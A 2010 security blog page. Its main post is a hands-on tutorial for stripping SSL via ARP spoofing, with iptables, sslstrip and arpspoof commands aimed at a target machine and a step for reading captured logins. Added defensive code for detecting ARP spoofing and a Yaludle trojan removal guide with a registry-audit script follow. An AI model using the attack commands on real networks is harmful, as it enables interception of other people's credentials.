Jan 30 2010

Quick Update

Category: Practical | Parker @ 7:17 pm

Well, it certainly wasn’t quick, but I have taken some time to organise things a little better within the malware sample section and have also added my personal twist to the WordPress theme I use.

Not awe-inspiring, but I think it looks OK.


Jan 24 2010

Backtrack 4 & SSLStrip-0.7 at last!

Category: Password Stealing, Practical | Parker @ 9:56 pm

OK,

So I have been wanting to document this for a while, but have failed to do so. Luckily time and the recent BackTrack4 final release have conspired with me today, so I have been able to do it at last. So, sitting comfortably? Here comes the science bit.

Before you do this, I suggest you have the following installed: SSLStrip and Python. Make sure you also have a Linux distribution (such as BackTrack) and hardware combo that supports ARP injection. Once all of that is in place, you can conduct what is a very simple attack. (For reference, I use an Acer Aspire One Z250 and BackTrack 4.)

  • First, enable port forwarding by entering the following into a terminal window:

      echo "1" > /proc/sys/net/ipv4/ip_forward

  • Then define what traffic you wish to capture (always port 80, I would think) and which port you will forward this traffic to. The values in angle brackets should be replaced with the relevant ports:

      iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>

  • You must now use that clever man’s python script to start stripping out the SSL, matching the listenPort with that above:

      python sslstrip.py -l <listenPort>

Having set your machine to pick up, forward and inspect all the traffic from your target machine, you now need to ensure that all of that traffic is actually routed through your hardware. We do this with a Man In The Middle attack, placing yourself between the target machine and the network router.
We achieve this with a simple ARP attack, which continually ‘informs’ the target machine that you are the router with which it wishes to speak.

  • Within a new terminal window (to keep it clean, if nothing else), enter the following (values in angle brackets should be replaced with the relevant values):

      arpspoof -i <interface> -t <targetIP> <gatewayIP>


Now all you need to do is wait. All the target machine’s traffic will route through your machine and their browsing will probably seem slow, but any sites they visit that implement poor SSL encryption will be easy prey. The captured data is written to a .log file; read it by opening a new terminal (in the SSLStrip directory) and entering:

    more sslstrip.log

You’ll note that such popular sites as www.facebook.com / www.twitter.com and the “newly secure” www.gmail.com are all easy pickings!
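The attack above works only while the target keeps accepting unsolicited ARP replies that claim the gateway's IP address, so the first thing a defender looks for is the victim's own ARP table changing under it. The following is an added example (my code, not the post's and not part of SSLStrip or arpspoof): it parses two snapshots of `arp -n` style output, taken before and after the attack, and flags two signals, the gateway IP's MAC address changing and a single MAC answering for the gateway and another host at once. The snapshots, IPs and MACs are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample: `arp -n` output on the victim before and after an ARP
# spoofing run. Addresses are made up; 192.168.1.1 plays the gateway.
SNAPSHOT_BEFORE = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.1.1              ether   00:11:22:33:44:55   C                     eth0
192.168.1.50             ether   aa:bb:cc:dd:ee:ff   C                     eth0
"""

SNAPSHOT_AFTER = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.1.1              ether   aa:bb:cc:dd:ee:ff   C                     eth0
192.168.1.50             ether   aa:bb:cc:dd:ee:ff   C                     eth0
"""

# One data row of `arp -n`: IPv4 address, "ether", then a colon-separated MAC.
ARP_LINE = re.compile(r"^(\d+\.\d+\.\d+\.\d+)\s+ether\s+([0-9a-f:]{17})\s", re.I)


def parse_arp_table(text):
    """Return {ip: mac} from `arp -n` style output, skipping the header line."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.match(line)
        if m:
            table[m.group(1)] = m.group(2).lower()
    return table


def detect_arp_spoof(baseline, current, gateway_ip):
    """Compare a trusted baseline table with the current one.

    Returns a list of human-readable findings (empty when nothing changed):
      * the gateway's MAC differs from the baseline, and/or
      * one MAC now claims the gateway IP plus at least one other IP,
        which is what a host poisoning the victim's cache looks like.
    """
    findings = []
    old_mac = baseline.get(gateway_ip)
    new_mac = current.get(gateway_ip)
    if old_mac and new_mac and old_mac != new_mac:
        findings.append(f"gateway {gateway_ip} MAC changed {old_mac} -> {new_mac}")

    by_mac = defaultdict(list)
    for ip, mac in current.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if gateway_ip in ips and len(ips) > 1:
            others = ", ".join(ip for ip in ips if ip != gateway_ip)
            findings.append(f"MAC {mac} claims gateway {gateway_ip} and {others}")
    return findings


if __name__ == "__main__":
    before = parse_arp_table(SNAPSHOT_BEFORE)
    after = parse_arp_table(SNAPSHOT_AFTER)
    for finding in detect_arp_spoof(before, after, "192.168.1.1"):
        print("ALERT:", finding)
```

The baseline should be captured on a network you trust (or pinned with a static ARP entry for the gateway, which is the simplest host-side mitigation); switch-side Dynamic ARP Inspection stops the spoofed replies before they reach the victim at all.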

[Image: Details captured by SSLStrip]

I thank you!


Jan 14 2010

MitM attack with SSLStrip

Category: Practical | Parker @ 8:24 am

Urm, got kind of distracted of late and haven’t got around to documenting how you conduct the same LAN attack. Have just found out that BackTrack4 Final has been released though, so I will install that and then do it. I promise.



Jan 04 2010

Yaludle

Category: Malware, Practical, Programs, Trojan | Parker @ 9:27 pm

Well, another virus is on the radar; this one carries the alias Yaludle.
There is no real information about the installer or exploit type, but suffice to say this one is bad news: by replacing a number of key driver entries within your registry, it ensures that it loads every time your PC does.

As a very quick synopsis of the risks, this virus enables Man In The Browser / Man In The Middle attacks, which will typically go after your banking credentials, but as with many banking trojans, it is not above going after your other sensitive info with keylogging.

Anyway, to get rid of it, you need to do as follows:

  1. Close all instances of Internet Explorer.
  2. Open ProcessExplorer and Regedit.
  3. Get the DLL name from the registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\midi2 and write it down somewhere. It should be in the format of 8 hex digits + 1.
  4. Use ProcessExplorer to search for that hex value, and locate and close all found handles that carry it (some may be mutex objects). In ProcessExplorer: View => Lower Pane View => Handles (or Ctrl+H), then Find => Find Handle or DLL, and search for the first 4 digits of the file name. You get a list of handles that relate to the malware. Close them with ProcessExplorer or handle.exe.

Delete these registry keys:

  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\midi2
  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\wave1
  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux2
  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\mixer2
  • HKCU\Software\Macromedia\
  • HKCU\Software\AppDataLow\Software\Macromedia\
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WAB

Delete these files:

  • %Appdata%\Macromedia\Common\(8-digit-hex).exe
  • %TMP%\(8-digit-hex).tmp

I also recommend clearing the Temp folders on that machine.

  • %Temp%
  • %Systemroot%\Temp

Having done all of that, the machine should restart without any malicious Yaludle items present. For peace of mind, you can repeat step 4 above to ensure that no handles or other loaded objects still carry that hex value.
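Before deleting anything it is worth confirming, on an export of the registry rather than the live hive, that the Drivers32 and Run entries above really point at a hex-named file; legitimate Drivers32 entries such as midimap.dll sit right next to them. The following is an added example (my code, not the post's) that parses a .reg export, flags the value names the post lists (midi2, wave1, aux2, mixer2 under Drivers32 and WAB under HKCU Run) and pulls out the 8-hex-digit stem to feed into the Process Explorer handle search in step 4. The sample export is constructed, the paths and the stem 0a1b2c3d1 are made up, and the pattern "8 hex digits + 1" is my reading of the post (8 hex digits followed by at most one extra character); adjust HEX_STEM if your sample differs.

```python
import re
from ntpath import basename  # Windows path handling that also works on Linux/macOS

# Constructed sample .reg export. Legitimate entries are mixed in so the audit
# has to discriminate rather than flag everything under Drivers32.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"midimapper"="midimap.dll"
"msacm.imaadpcm"="imaadp32.acm"
"wave"="wdmaud.drv"
"midi2"="C:\\Users\\victim\\AppData\\Roaming\\Macromedia\\Common\\0a1b2c3d1.dll"
"wave1"="C:\\Users\\victim\\AppData\\Roaming\\Macromedia\\Common\\0a1b2c3d1.dll"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\\Windows\\System32\\ctfmon.exe"
"WAB"="C:\\Users\\victim\\AppData\\Roaming\\Macromedia\\Common\\0a1b2c3d1.exe"
'''

DRIVERS32 = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32"
RUN_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
WATCHED_DRIVER_NAMES = {"midi2", "wave1", "aux2", "mixer2"}  # names listed in the post
WATCHED_RUN_NAMES = {"WAB"}

# Assumption: the post's "8 hex digits + 1" means an 8-hex-digit stem plus at most
# one extra character, e.g. 0a1b2c3d1.dll. Group 1 captures the 8-digit stem.
HEX_STEM = re.compile(r"^([0-9a-f]{8})\w?\.(dll|exe|tmp)$", re.I)
VALUE_LINE = re.compile(r'^"([^"]+)"="(.*)"$')


def parse_reg_export(text):
    """Return {key_path: {value_name: value_data}} from REGEDIT5 .reg text.

    Only string values ("name"="data") are parsed; .reg escapes backslashes
    as \\\\ in string data, so they are unescaped here.
    """
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None:
            m = VALUE_LINE.match(line)
            if m:
                keys[current][m.group(1)] = m.group(2).replace("\\\\", "\\")
    return keys


def audit_yaludle_keys(keys):
    """Return (key, value_name, path) for every watched value that is present.

    Presence alone is reported, because the post says to delete these names;
    hex_stems() below tells you which of them also match the file pattern.
    """
    findings = []
    for key, watched in ((DRIVERS32, WATCHED_DRIVER_NAMES), (RUN_KEY, WATCHED_RUN_NAMES)):
        for name, data in keys.get(key, {}).items():
            if name in watched:
                findings.append((key, name, data))
    return findings


def hex_stems(findings):
    """The distinct 8-hex-digit stems among the findings, for the handle search."""
    stems = set()
    for _, _, path in findings:
        m = HEX_STEM.match(basename(path))
        if m:
            stems.add(m.group(1).lower())
    return sorted(stems)


if __name__ == "__main__":
    found = audit_yaludle_keys(parse_reg_export(SAMPLE_REG))
    for key, name, path in found:
        print(f"{key}\\{name} -> {path}")
    print("search Process Explorer handles for:", hex_stems(found))
```

Export the keys with `reg export` (or File => Export in Regedit) and run the script against the file; a clean machine normally has none of the watched names at all, so any finding is worth a look.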